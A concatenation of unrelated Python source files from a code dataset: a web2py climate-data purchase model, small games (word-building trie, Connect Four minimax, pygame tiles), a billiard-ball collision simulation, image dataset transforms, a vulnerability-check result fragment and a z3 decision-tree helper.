year,month = ClimateDataPortal.month_number_to_year_month(date)\n return \"%s-%s\" % (month, year)\n else:\n return NONE\n \n table.virtualfields.append(station_parameters_virtualfields())\n \n s3mgr.configure(\n tablename,\n insertable = False,\n list_fields = [\n \"station_id\",\n \"parameter_id\",\n (T(\"Range From\"), \"range_from\"),\n (T(\"Range To\"), \"range_to\"),\n ]\n )\n \n # Load all stations and parameters\n if not db(table.id > 0).count():\n station_rows = db(\n climate_station_name.id > 0\n ).select(\n climate_station_name.id\n )\n for station_row in station_rows:\n parameter_rows = db(\n climate_sample_table_spec.sample_type_code == \"O\"\n ).select(climate_sample_table_spec.id)\n for parameter_row in parameter_rows:\n table.insert(\n station_id = station_row.id,\n parameter_id = parameter_row.id\n )\n \n \n # =====================================================================\n # Purchase Data\n #\n nationality_opts = {1:\"Nepali\", 2:\"Foreigner\"}\n \n resourcename = \"purchase\"\n tablename = \"climate_purchase\"\n table = db.define_table(\n tablename,\n #user_id(),\n #Field(\"sample_type_code\",\n # \"string\",\n # requires = IS_IN_SET(sample_type_code_opts),\n # represent = lambda code: ClimateDataPortal.sample_table_types_by_code[code]\n #),\n parameter_id(\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n filterby = \"sample_type_code\",\n filter_opts = [\"O\"],\n sort=True\n ),\n ),\n station_id(),\n Field(\"date_from\",\n \"date\",\n requires = IS_DATE(format = s3_date_format),\n widget = S3DateWidget(),\n default = request.utcnow,\n required = True\n ),\n Field(\"date_to\",\n \"date\",\n requires = IS_DATE(format = s3_date_format),\n widget = S3DateWidget(),\n default = request.utcnow,\n required = True\n ),\n Field(\"nationality\",\n \"integer\",\n label = T(\"Nationality\"),\n requires = IS_IN_SET(nationality_opts),\n represent = lambda id: nationality_opts.get(id, NONE),\n required = True\n ),\n Field(\"purpose\",\n \"text\"\n ),\n Field(\"price\", \n \"string\",\n ),\n Field(\"paid\",\n \"boolean\",\n represent = lambda paid: paid and \"Yes\" or \"No\",\n ),\n *s3_meta_fields()\n )\n \n if not s3_has_role(ADMIN):\n db.climate_purchase.paid.writeable = False\n \n # CRUD strings\n ADD_CLIMATE_PURCHASE = T(\"Purchase New Data\")\n LIST_CLIMATE_PURCHASE = T(\"All Purchased Data\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_CLIMATE_PURCHASE,\n title_display = T(\"Purchased Data Details\"),\n title_list = LIST_CLIMATE_PURCHASE,\n title_update = T(\"Edit Purchased Data Details\"),\n title_search = T(\"Search Purchased Data\"),\n subtitle_create = ADD_CLIMATE_PURCHASE,\n subtitle_list = T(\"Purchased Data\"),\n label_list_button = LIST_CLIMATE_PURCHASE,\n label_create_button = ADD_CLIMATE_PURCHASE,\n label_delete_button = T(\"Remove Purchased Data\"),\n msg_record_created = T(\"Data Purchase In Process\"),\n msg_record_modified = T(\"Data Purchase Processed\"),\n msg_record_deleted = T(\"Data Purchase removed\"),\n msg_list_empty = T(\"No Data Purchased\"))\n \n def climate_purchase_onaccept(form):\n # Calculate Price\n id = form.vars.id\n \n parameter_table = db(\n db.climate_sample_table_spec.id == form.vars.parameter_id\n ).select(\n db.climate_sample_table_spec.id,\n db.climate_sample_table_spec.date_mapping\n ).first()\n parameter_table_id = parameter_table.id\n date_mapping_name = parameter_table.date_mapping\n period = date_mapping_name\n \n date_from = form.vars.date_from\n date_to = form.vars.date_to\n nationality = int(form.vars.nationality)\n if nationality == 1:\n period_dict = dict(\n daily = 60,\n monthly = 40\n # 3:15,\n # 4:5\n )\n currency = \"NRs\"\n else:\n period_dict = dict(\n daily = 2,\n monthly = 1.5\n # 3:0.5,\n # 4:0.25}\n )\n currency = \"US$\"\n \n date_mapping = getattr(ClimateDataPortal, date_mapping_name)\n \n start_date_number = date_mapping.date_to_time_period(date_from)\n end_date_number = date_mapping.date_to_time_period(date_to)\n \n place_id = int(form.vars.station_id)\n \n duration = db.executesql(\n \"SELECT COUNT(*) \"\n \"FROM climate_sample_table_%(parameter_table_id)i \"\n \"WHERE time_period >= %(start_date_number)i \"\n \"AND place_id = %(place_id)i \"\n \"AND time_period <= %(end_date_number)i;\" % locals()\n )[0][0]\n price = \"%.2f\" % (duration * period_dict[period] / (dict(daily=365.25, monthly=12)[period]))\n db.climate_purchase[id] = {\"price\": \"%s %s\" % (price, currency)}\n\n s3mgr.configure(\n tablename,\n onaccept = climate_purchase_onaccept,\n create_next = aURL( args = [\"[id]\",\"read\"]),\n #listadd = listadd\n )\n \n # =====================================================================\n # Saved Queries\n #\n resourcename = \"save_query\"\n tablename = \"climate_save_query\"\n table = db.define_table(\n tablename,\n #user_id(),\n Field(\"description\", \"string\"),\n Field(\"query_definition\", \"text\"),\n )\n\n # CRUD strings\n ADD_SAVE_QUERY = T(\"Save Query\")\n LIST_SAVE_QUERY = T(\"Saved Queries\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_SAVE_QUERY,\n title_display = T(\"Saved Query Details\"),\n title_list = LIST_SAVE_QUERY,\n title_update = T(\"Edit Saved Query\"),\n title_search = T(\"Search Saved Queries\"),\n subtitle_create = ADD_SAVE_QUERY,\n subtitle_list = T(\"Saved Queries\"),\n label_list_button = LIST_SAVE_QUERY,\n label_create_button = ADD_SAVE_QUERY,\n label_delete_button = T(\"Remove Saved Query\"),\n msg_record_created = T(\"Query Saved\"),\n msg_record_modified = T(\"Saved Query updated\"),\n msg_record_deleted = T(\"Saved Query removed\"),\n msg_list_empty = T(\"No Queries Saved\"))\n \n s3mgr.configure(\n tablename,\n listadd = False\n )\n \n # =====================================================================\n","sub_path":"models/climate.py","file_name":"climate.py","file_ext":"py","file_size_in_byte":17812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436400205","text":"import os\r\nimport shutil\r\n\r\n# print(os.name)\r\n# print()\r\n#\r\n# print(os.environ)\r\n# print()\r\n#\r\n# print(os.environ.get(\"JAVA_HOME\"))\r\n# print()\r\n#\r\n# print(os.path.abspath('.'))\r\n# print()\r\n\r\n# os.mkdir(\"zym\")\r\n# input(\"input: \")\r\n# os.rmdir(\"zym\")\r\n\r\nfor x in os.listdir('.'):\r\n # if os.path.isfile(x) and os.path.splitext(x)[1] == '.py':\r\n if os.path.isfile(x):\r\n print('file: ' + os.path.abspath(x))\r\n if os.path.isdir(x):\r\n print('path: ' + x)\r\n","sub_path":"PycharmProjects/learning/file_dir.py","file_name":"file_dir.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600985219","text":"from trie import trie\nimport pickle\nimport sys\nimport numpy as np\nimport time\nimport os\nimport dict\n\ndef win_title(title):\n if os.name == 'posix':\n print(f'\\33]0;{title}\\a', end='', flush=True)\n else:\n os.system(f\"title {title}\")\n\ndef clrscr():\n if os.name == 'posix':\n os.system(\"clear\")\n else:\n os.system('cls')\n\ndef load_model(file_name):\n obj_file = open(file_name, 'rb')\n tree = trie()\n tree = pickle.load(obj_file)\n return tree\n\n\nclass player(object):\n \n def __init__(self, vocab_tree):\n self.vocab_tree = vocab_tree\n self.current_node = self.vocab_tree.root\n self.score = 0\n \n def reset(self):\n self.current_node = self.vocab_tree.root\n\n def play(self, word):\n \n if(len(word)==0):\n self.current_node = np.random.choice(self.current_node.children)\n return word + self.current_node.val\n last_char = word[-1]\n if(last_char in [child.val for child in self.current_node.children]):\n self.current_node = [child for child in self.current_node.children if child.val == last_char][0]\n if len(self.current_node.children) == 0 or self.current_node.isend:\n self.stop()\n else:\n self.current_node = np.random.choice(self.current_node.children) \n print(\"Move : \", self.current_node.val)\n word = word + self.current_node.val\n else:\n self.get_show(word)\n return word\n\n def show(self, pref):\n self.vocab_tree.words_with(pref)\n \n\n def get_show(self, word):\n global done, user_score\n print(\"Show\")\n word_ = input(\"~> \")\n if not word in word_ or len(word_) < 4 :\n print(f\"What? We're talking about something that starts with {word.upper()}, of length greater or equal to 4.\")\n self.get_show(word)\n return\n elif dict.check(word_):\n print(\"You're right; didn't think of that one :) \")\n self.score -= 1\n self.vocab_tree.add(word_)\n else:\n print(\"I knew you were bluffing ;) \")\n user_score -= 1\n done = True\n\n def stop_response(self, word):\n global user_score\n if not(dict.check(word)) or len(word) < 4:\n print(\"Nope. Real words with length >= 4 only.\")\n user_score -= 1\n return\n self.vocab_tree.add(word)\n self.score -= 1\n\n def stop(self):\n global done, user_score\n print(\"STOP\\n \")\n user_score -= 1\n done = True\n \n \ndef main(bot):\n global done, user_score, bored\n done = False\n word = \"\"\n bot.reset()\n while not done:\n \n print(word)\n ch = (input('>> '))\n if ch.lower() == 'stop':\n bot.stop_response(word)\n done = True\n break\n elif ch.lower() == 'exit()':\n bored = False\n break\n elif ch.lower() == 'show':\n if len(word):\n bot.show(word)\n user_score -= 1\n done = True\n break\n else:\n print(\"Atleast make a move.\")\n continue\n elif len(ch) != 1 and len(word)>0:\n print(\"Invalid command\\n\")\n continue\n word = word + ch.lower()\n word = bot.play(word)\n if bored:\n input(\"Enter any char to continue\\n\")\n return bot\n \nif __name__ == \"__main__\":\n\n win_title(\"Wyrd\")\n user_score = 0\n bot = player(load_model('Resources/player_vocab.pickle'))\n bored = True\n while bored:\n clrscr()\n print(\"WORD BUILDING\")\n print(f\"Your Score : {user_score} || Bot's score : {bot.score}\")\n bot = main(bot)\n obj_file = open(\"Resources/player_vocab.pickle\", 'wb')\n pickle.dump(bot.vocab_tree, obj_file)\n obj_file.close()\n","sub_path":"wyrd.py","file_name":"wyrd.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"351980456","text":"import pygame\nimport sprites\nlavasprites = pygame.sprite.Group()\ndoors = pygame.sprite.Group()\ntile_size = 25\nclass World():\n def __init__(self, data):\n self.tile_list = []\n #load images\n dirt_img = pygame.image.load('dirt.png')\n grass_img = pygame.image.load('grass.png')\n water_img = pygame.image.load('water.png')\n row_count = 0\n for row in data:\n col_count = 0\n for tile in row:\n if tile ==1:\n img = pygame.transform.scale(dirt_img,(tile_size, tile_size))\n img_rect = img.get_rect()\n img_rect.x = col_count * tile_size\n img_rect.y = row_count * tile_size\n tile = (img, img_rect)\n self.tile_list.append(tile)\n elif tile == 2:\n img = pygame.transform.scale(grass_img,(tile_size, tile_size))\n img_rect = img.get_rect()\n img_rect.x = col_count * tile_size\n img_rect.y = row_count * tile_size\n tile = (img, img_rect)\n self.tile_list.append(tile)\n elif tile == 3:\n tilelava = sprites.lavasprite(col_count * tile_size, row_count * tile_size)\n lavasprites.add(tilelava)\n elif tile == 4:\n tiledoor = sprites.flag(col_count * tile_size, row_count * tile_size)\n doors.add(tiledoor)\n col_count += 1\n row_count += 1\n\n def draw(self, screen):\n for tile in self.tile_list:\n screen.blit(tile[0],tile[1])\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"77906105","text":"import random\nfrom math import *\nimport datetime\n\n\nclass Ball(object):\n dt = 0.1\n\n def __init__(self, idd):\n self.vx0 = -1\n self.vy0 = -1\n self.x0 = -1\n self.y0 = -1\n self.vx = -1\n self.vy = -1\n self.x = -1\n self.y = -1\n self.R = 25\n self.id = idd # ball id\n self.collisionBallNr = 99999\n self.ifCollisionCompleted = False\n self.color = \"blue\"\n self.setInitialBallVelocity()\n\n def nextStep(self):\n self.x = self.x + self.vx * Ball.dt\n self.y = self.y + self.vy * Ball.dt\n\n def ifCollisionWithBall(self, balls): # set new velocities after collision\n\n Xcoll = 0\n Ycoll = 0\n distanceFromBall = 99999\n for i in balls:\n if i.id != self.id:\n distanceFromBall = sqrt((self.x - i.x) ** 2 + (self.y - i.y) ** 2)\n if distanceFromBall <= 2 * self.R and self.ifCollisionCompleted == False:\n self.collisionBallNr = i.id\n Xcoll = (self.x + i.x) / 2\n Ycoll = (self.y + i.y) / 2\n alpha = 3.14159 / 2 - atan(float(self.y - i.y) / (self.x - i.x)) # collision angle\n\n Vs = cos(alpha) * self.vx - sin(alpha) * self.vy\n Vn = sin(alpha) * self.vx + cos(alpha) * self.vy\n Vs_i = cos(alpha) * i.vx - sin(alpha) * i.vy\n Vn_i = sin(alpha) * i.vx + cos(alpha) * i.vy\n Vn_po = Vn_i\n Vni_po = Vn\n self.vx = cos(alpha) * Vs + Vn_po * sin(alpha)\n self.vy = cos(alpha) * Vn_po - sin(alpha) * Vs\n i.vx = cos(alpha) * Vs_i + Vni_po * sin(alpha)\n i.vy = cos(alpha) * Vni_po - sin(alpha) * Vs_i\n # print(\"Vx po:\",self.vx, \"Vy=\",self.vy,\"Vxi=\",i.vx,\" Vyi=\",i.vy)\n\n i.ifCollisionCompleted = True\n self.ifCollisionCompleted = True\n elif distanceFromBall > 2 * self.R and self.ifCollisionCompleted == True and i.id == self.collisionBallNr:\n # print(datetime.datetime.now(), \"ELSE odl od kuli z id {0}: \".format(i.id), distanceFromBall)\n self.ifCollisionCompleted = False\n i.ifCollisionCompleted = False\n\n def ifCollisionWithEdge(self):\n if self.x + self.R >= Table.borderCoordinatesX[1] and self.vx > 0:\n self.vx = -self.vx\n if self.x - self.R <= Table.borderCoordinatesX[0] and self.vx < 0:\n self.vx = -self.vx\n if self.y - self.R <= Table.borderCoordinatesY[0] and self.vy < 0:\n self.vy = -self.vy\n if self.y + self.R >= Table.borderCoordinatesY[1] and self.vy > 0:\n self.vy = -self.vy\n\n def setInitialBallVelocity(self):\n self.vx0 = random.randint(-10, 10)\n self.vy0 = random.randint(-10, 10)\n self.vx = self.vx0\n self.vy = self.vy0\n\n\nclass Table(object):\n L = 500 # table size\n W = 400\n borderCoordinatesX = [0, L] # border coordinates of the table\n borderCoordinatesY = [0, W]\n colors = ['yellow', 'blue', 'red', 'green', 'white', 'grey', 'purple', 'black', 'brown', 'orange', 'yellow', 'blue',\n 'red', 'green', 'white', 'grey', 'purple', 'black', 'brown', 'orange']\n\n def __init__(self, Nn, dtt):\n self.N = Nn # number of balls\n self.dt = dtt # time step size\n Ball.dt = dtt\n self.balls = [Ball(i) for i in range(self.N)]\n for i in range(0, self.N):\n self.balls[i].color = self.colors[i]\n self.initialBallsPositions = {} # have to be unique for each ball\n self.setInitialBallsPositions(self.balls)\n self.getInitialPositionsAndVelocities(self.balls)\n\n def setInitialBallsPositions(self, balls):\n\n for i in balls:\n while i.x0 == -1 and i.y0 == -1:\n x = random.randint(i.R, Table.L - i.R)\n y = random.randint(i.R, Table.W - i.R)\n for j in balls:\n if i.id != j.id and x <= (j.x + 2 * j.R) and y <= (j.y + 2 * j.R) and x >= (\n j.x - 2 * j.R) and y >= (j.y - 2 * j.R):\n x = -1\n y = -1\n i.x0 = x\n i.y0 = y\n i.x = i.x0\n i.y = i.y0\n\n def getInitialPositionsAndVelocities(self, balls):\n\n for i in range(self.N):\n self.initialBallsPositions[balls[i].color] = [balls[i].x, balls[i].y]\n self.initialBallsPositions[balls[i].color] = [balls[i].vx0, balls[i].vy0]\n print(\"Initial balls positions: \", self.initialBallsPositions)\n print(\"Initial balls velocities: \", self.initialBallsPositions)\n\n def actualVelocity(self, ballNr, t):\n\n return [self.balls[ballNr].vx, self.balls[ballNr].vy]\n\n def actualPosition(self, ballNr, t):\n\n for i in range(0, self.N):\n self.balls[i].nextStep()\n self.balls[i].ifCollisionWithEdge()\n self.balls[i].ifCollisionWithBall(self.balls)\n return [self.balls[ballNr].x, self.balls[ballNr].y]\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pool2D.py","file_name":"pool2D.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"32409146","text":"\"\"\"\n Connect Four v3 Work in Progress (W.I.P.). Programmed by Jolyon Shah.\n\"\"\"\n\nimport random\nimport time\n\n\n# Displays the board.\ndef display_board(board):\n \"\"\"\n Displays the board as a nice grid.\n \"\"\"\n\n # Prints the initial column headings first.\n print (\"\\n 1 2 3 4 5 6 7\")\n print (\" -----------------------------\")\n\n for row in range(0,6):\n print (\" \", end = \"\")\n # Prints each row, one at a time.\n for col in range(0,7):\n print (\"| %s \" % (board[row][col]), end=\"\")\n\n print (\"|\\n -----------------------------\")\n\n return None\n\n\n\n# Copies an array so as to make sure that there are no problems with mutability.\ndef copy_array(array):\n \"\"\"\n Copies an array (lists in lists) using the 'slice' method.\n \"\"\"\n return [array[x][:] for x in range(0,len(array))]\n\n\n# Returns the alternate player, such that if \"X\" is the input, \"O\" is the output, and vice versa.\ndef alt_player(player):\n \"\"\"\n Returns the other player, so if the input is \"X\", then the output is \"O\", and\n vice versa.\n \"\"\"\n return \"X\" if player == \"O\" else \"O\"\n\n\n# Given a column heading, this will perform the move.\ndef set_move(board, column, player):\n \"\"\"\n This will make a move given the board, the column and the player.\n \"\"\"\n # This loop will search the board from bottom up for a clear spot.\n for row in range (5,-1,-1):\n if board[row][column] == \" \":\n board[row][column] = player\n break\n\n return board\n\n\n# Obtains a column for the move that the player is to make.\ndef player_move(board, player):\n \"\"\"\n Takes a move from a human player and outputs it, returning it as the list\n index as opposed to the raw number (column 1 is 0, etc).\n \"\"\"\n # Generates a moveset of possible columns that have at least the top spot free.\n moveset = [str(x+1) for x in range(0,7) if board[0][x] == \" \"]\n column = \"None\"\n\n # This loop takes the players move and ensures that it is within the possible moveset.\n while column not in moveset:\n column = input(\"Move: \")\n\n return int(column)-1\n\n\n# The computer's move - outputs the 'best' column, as calculated by a minimax algorithm.\ndef npc_move(player, board, depth, debug=False):\n \"\"\"\n 'Non-Playable-Character' (NPC)'s move. Uses a minimax given the player,\n the board, the depth to test to, and debug, whereby True outputs some\n extra debugging information about the final scoring of the board.\n \"\"\"\n \n # This function is designed to call itself as it checks to the certain depth.\n def depth_check(player, board, depth, count):\n \"\"\"\n This function is designed to call itself in order to test a user-specified\n depth. This will return the score at the 'deep end' of the check, unless\n a win is detected earlier, in which case the win score will be returned instead.\n The scores for each column is outputted as a list.\n \"\"\"\n # Creates some initial stats for the iterations to run off.\n move_set = [x for x in range(0,7) if board[0][x] == \" \"]\n move_count = len(move_set)\n move_scores = [0 for x in range(0,move_count)]\n\n # This loop will test every possible move for the given depth (up to 7).\n for n in range (0,move_count):\n test_board = set_move(copy_array(board), move_set[n], player if (count%2 == 0) else alt_player(player))\n move_scores[n] = score_board(test_board, player) * depth\n # This determines whether the next depth for a given possible move needs exploring.\n if len([x for x in range(0,6) if \" \" in test_board[x]]) > 0 and depth > 1 and abs(move_scores[n]) < 1e10:\n deeper_scores = depth_check(player, test_board, depth-1, count+1)\n move_scores[n] = min(deeper_scores) if count%2 == 0 else max(deeper_scores)\n\n return move_scores\n\n\n surface_move_set = [x for x in range(0,7) if board[0][x] == \" \"]\n # This generates the final move scores, and sets them to 0 if no depths are looked at.\n if depth > 0:\n surface_move_scores = depth_check(player, board, depth, 0)\n else:\n surface_move_scores = [0 for x in range(len(surface_move_set))]\n # Whilst choosing the first move in the list that is optimal would work, randomising between them gives a little more variation.\n best_move_set = [surface_move_set[x] for x in range(0,len(surface_move_set)) if surface_move_scores[x] == max(surface_move_scores)]\n random.shuffle(best_move_set)\n # This section is included to help with debugging by seeing what moves the computer values.\n if debug is True:\n print (\"Possible moves: %s\" % (surface_move_set))\n print (\"Move scores: %s\" % (surface_move_scores))\n print (\"Considered moves: %s\" % (best_move_set))\n\n return best_move_set[0]\n\n\n# Scores the board, giving higher scores to better boards for the player.\ndef score_board(board, player):\n \"\"\"\n Scores the board for a given player.\n Points are allocated depending on how many possible wins there are.\n 1 for 1 piece + 3 spaces;\n 100 for 2 pieces + 2 spaces;\n 10000 for 3 pieces + 1 space;\n 1e10 for 4 pieces in a row (win).\n \"\"\"\n score = 0\n POINTS = [0,1,100,10000,1e10]\n chain = []\n\n # Checks for horizontal chains first.\n for row in range(0,6):\n for col in range(0,4):\n chain = board[row][col:col+4]\n if not (\"X\" in chain and \"O\" in chain):\n score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n # Checks for vertical chains.\n for row in range(0,3):\n for col in range(0,7):\n chain = [board[row+x][col] for x in range(0,4)]\n if not (\"X\" in chain and \"O\" in chain):\n score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n # Checks for diaganols from top left to bottom right.\n for row in range(0,3):\n for col in range(0,4):\n chain = [board[row+x][col+x] for x in range(0,4)]\n if not (\"X\" in chain and \"O\" in chain):\n score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n # Checks for diaganols from top right to bottom left.\n for row in range(0,3):\n for col in range(3,7):\n chain = [board[row+x][col-x] for x in range(0,4)]\n if not (\"X\" in chain and \"O\" in chain):\n score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n return score\n\n\n# This function generates a simple menu to make the management of options a little easier.\ndef get_option(title, contents, start_number=1):\n \"\"\"\n This function takes the input as a string for the title, a list of strings with\n each item as a selectable option from the menu, and start_number, which is what the\n first number in the menu should be (such that 1 will have 1,2,3, etc).\n It will output an integer.\n \"\"\"\n print (\"\\n= - = - = %s = - = - =\\n\" % (title))\n\n # This displays the entries, each with their own row and number.\n for entry in range(0,len(contents)):\n print (\" - %s: %s\" % (entry+start_number, contents[entry]))\n\n # This set lists the possible numbers for the user to choose from.\n menu_set = [str(x+start_number) for x in range (0,len(contents))]\n user_option = \"None\"\n\n while user_option not in menu_set:\n user_option = input(\"Number: \")\n\n return int(user_option)\n\n# The main menu will greet the player upon opening the program.\nMAIN_MENU_TITLE = \"Connect Four Main Menu\"\nMAIN_MENU_CONTENTS = [\n \"Two Player: Play against another human player.\",\n \"One Player: Play against the computer, choosing your difficulty setting.\",\n \"Zero Player: Watch the computer play against itself, choosing both difficulty settings.\"\n ]\n\n# The AI_MENU_TITLE has an open ending so that it can be changed easily.\nAI_MENU_TITLE = \"Connect Four Difficulty Menu for player \"\nAI_NAMES = [\"Random\",\"Terrible\",\"Average\",\"Adept\",\"Intelligent\",\"Expert\"]\nAI_MENU_CONTENTS = [\n \"%s: The computer's moves will be made completely randomly.\" % (AI_NAMES[0]),\n \"%s: The computer doesn't really think ahead. This should be easy.\" % (AI_NAMES[1]),\n \"%s: The computer plays with a little skill. Most people would win here.\" % (AI_NAMES[2]),\n \"%s: The computer plays with reasonable skill. You can win, but just as likely lose.\" % (AI_NAMES[3]),\n \"%st: The computer plays well, and winning here will require skill or a lot of luck.\" % (AI_NAMES[4]),\n \"%s: To win here consistantly requires considerable skill. Not for beginners.\" % (AI_NAMES[5])\n ]\n\nprint (\"\\n\\n========================| Connect Four v3 by Jolyon Shah |========================\\n\\n\")\n\nreplay = True\n\nreset = True\n\nwhile replay is True:\n\n # Initialises some starting variables that reset for every game.\n board = [[\" \" for y in range(0,7)] for x in range(0,6)]\n player = \"O\" if random.randint(0,1) == 0 else \"X\"\n winner = 0\n\n # Resets the options if requested, or if the first time.\n if reset is True:\n player_scores = [0,0]\n player_one = \"Human Player One\"\n player_two = \"Human Player Two\"\n game_mode = get_option(MAIN_MENU_TITLE, MAIN_MENU_CONTENTS, 1)\n\n # This sets up the names to be displayed, as well as the difficulties for the computer players.\n if game_mode == 1:\n player_one = input(\"Please enter Player One's (X) name: \") + \" (X)\"\n player_two = input(\"Please enter Player Two's (O) name: \") + \" (O)\"\n\n elif game_mode == 2:\n player_one = input(\"Please enter Player One's (X) name: \") + \" (X)\"\n computer_two = get_option(AI_MENU_TITLE+\"two\", AI_MENU_CONTENTS, 0)\n player_two = AI_NAMES[computer_two] + \" (O)\"\n\n elif game_mode == 3:\n computer_one = get_option(AI_MENU_TITLE+\"one\", AI_MENU_CONTENTS, 0)\n player_one = AI_NAMES[computer_one] + \" (X)\"\n computer_two = get_option(AI_MENU_TITLE+\"two\", AI_MENU_CONTENTS, 0)\n player_two = AI_NAMES[computer_two] + \" (O)\"\n\n # A few extra options.\n sleep = input(\"Would you like an added delay of one second between the computer's moves? Y/N \").lower().startswith(\"y\")\n debug = input(\"Would you like to enable debug mode? Y/N \").lower().startswith(\"y\")\n\n # Displays the board for the first time.\n print (\"\\n======================================\")\n display_board(board)\n print (\"\\n======================================\")\n\n while winner < 1e9:\n\n # Alternates the player and displays the current player's turn.\n player = alt_player(player)\n print (\"%s's turn!\" % (player_one if player == \"X\" else player_two))\n\n # Performs a move for the current player. Gamemodes 1 and 2 have a human as Xs, and gamemode 1 has a human as Os.\n if player == \"X\":\n if game_mode in [1,2]:\n move = player_move(board, player)\n board = set_move(board, move, player)\n else:\n if sleep is True:\n time.sleep(1)\n move = npc_move(player, board, computer_one, debug)\n board = set_move(board, move, player)\n\n else:\n if game_mode == 1:\n move = player_move(board, player)\n board = set_move(board, move, player)\n else:\n if sleep is True:\n time.sleep(1)\n move = npc_move(player, board, computer_two, debug)\n board = set_move(board, move, player)\n\n # Outputs the move that was just made.\n print (\"======================================\\n\")\n print (\"%s moved to column %s.\" % (player_one if player == \"X\" else player_two, move+1))\n display_board(board)\n print (\"\\n======================================\")\n\n winner = score_board(board, player)\n\n # This checks for draws.\n if len([x for x in range(0,6) if \" \" not in board[x]]) == 6:\n print (\"Stalemate! Nobody wins!\")\n break\n\n # This next section handles the winner.\n if winner > 1e9:\n if player == \"X\":\n player_scores[0] += 1\n print (\"%s wins! Well done!\" % (player_one))\n print (\"Better luck next time, %s\" % (player_two))\n else:\n player_scores[1] += 1\n print (\"%s wins! Well done!\" % (player_two))\n print (\"Better luck next time, %s\" % (player_one))\n\n print (\"\\nScores:\")\n print (\"%s: %s wins\" % (player_one, player_scores[0]))\n print (\"%s: %s wins\" % (player_two, player_scores[1]))\n\n replay = input(\"Would you like to play again? Y/N \").lower().startswith(\"y\")\n\n if replay is True:\n reset = input(\"Would you like to reset scores and settings? Y/N \").lower().startswith(\"y\")\n\n\nprint (\"\\n\\n=-=-=-=-=-=-=-=-=-=-=-= Thank you for playing! =-=-=-=-=-=-=-=-=-=-=-=\\n\\n\")\n","sub_path":"Running Code (Python).py","file_name":"Running Code (Python).py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"470305744","text":"import os\nimport torch\nimport pandas as pd\nfrom skimage import io,transform\nimport numpy as np\nfrom torch.utils.data import Dataset,DataLoader\nfrom torchvision import transforms,utils\nimport matplotlib.pyplot as plt\nfrom torchvision.transforms import functional as G\nimport random\nfrom PIL import Image\n\n\n\nclass Rescale(object):\n def __init__(self,output_size,process):\n assert isinstance(output_size,tuple)\n self.output_size=output_size\n self.process=process\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n new_h,new_w=self.output_size\n new_h,new_w=int(new_h),int(new_w)\n \n if self.process=='training':\n img=transform.resize(img,(new_h,new_w))\n annotation=transform.resize(annotation,(new_h,new_w))\n return {'img':img,'annotation':annotation}\n\n elif self.process=='validation':\n img=transform.resize(img,(new_h,new_w))\n annotation=transform.resize(annotation,(new_h-184,new_w-184))\n return {'img':img,'annotation':annotation}\n \n \n else:\n print('input the process parameter as training/validation.')\n \n \n\n \nclass RandomCrop(object):\n def __init__(self,output_size):\n assert isinstance(output_size,tuple)\n self.output_size=output_size\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n h,w=img.shape[:2]\n new_h,new_w=self.output_size\n \n top=np.random.randint(0,h-new_h)\n left=np.random.randint(0,w-new_w)\n \n img=img[top:top+new_h,left:left+new_w]\n annotation=annotation[top:top+new_h,left:left+new_w]\n annotation=transform.resize(annotation,(new_h-184,new_w-184))\n \n return {'img':img,'annotation':annotation} \n \n \nclass Random_Vertical_Flip(object):\n def __init__(self,p=0.5):\n self.p=p\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n if random.random()= 0:\n sResult = 'com_mailto spam detected'\nelse:\n sResult = 'OK'","sub_path":"exploits/1.5.x/com_mailto_spam.py","file_name":"com_mailto_spam.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"549847893","text":"import time\nfrom z3 import *\nimport copy\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nX=Int('X')\nX1=Int('X1')\n\nDT=TreeNode(X%2==0)\nDT.left=TreeNode(\"False\")\nDT.right=TreeNode(X1%2==0)\nDT.right.right=TreeNode(\"True\")\nDT.right.left=TreeNode(\"False\")\n\ndef tree2Expr(DT) -> str:\n # 结点时术语\n if DT == True: #假设的是pts为空 将树默认设置为True\n return \"True\"\n expr = \"\"\n if(type(DT.val)==type(\"False\")):\n # print(DT.val)\n return DT.val\n if (type(DT.val) == type(X == X1)):\n expr = \"If(\"+str(DT.val)+\",\"+tree2Expr(DT.left) +\",\"+tree2Expr(DT.right)+\")\"\n if(type(DT.val) == type(X) or type(DT.val) == type(0)):\n expr = str(DT.val)\n return expr\ndef tree2LossingFormula(DT)->str:\n t2ftime = time.time()\n paths=[] #存储一条路径 And(,,,)\n #如果single大于0 那么就 Or(,,,)起来\n stack=[] #python中栈y用数组实现 存放结点\n p=DT\n pre=None\n while(p!=None or len(stack)!=0):\n #到达最左边 p是非空谓词\n while(p!=None and type(p.val)!=type(\"term\")):\n stack.append(p)\n p=p.left\n \n #此时候p一定是叶子结点\n if p !=None and p.val==\"True\": \n if len(stack)==1:\n paths.append(stack[0].val)\n else:\n expr=\"And(\"\n for i in stack:\n # print(i.val)\n expr=expr+str(i.val)+\",\"\n 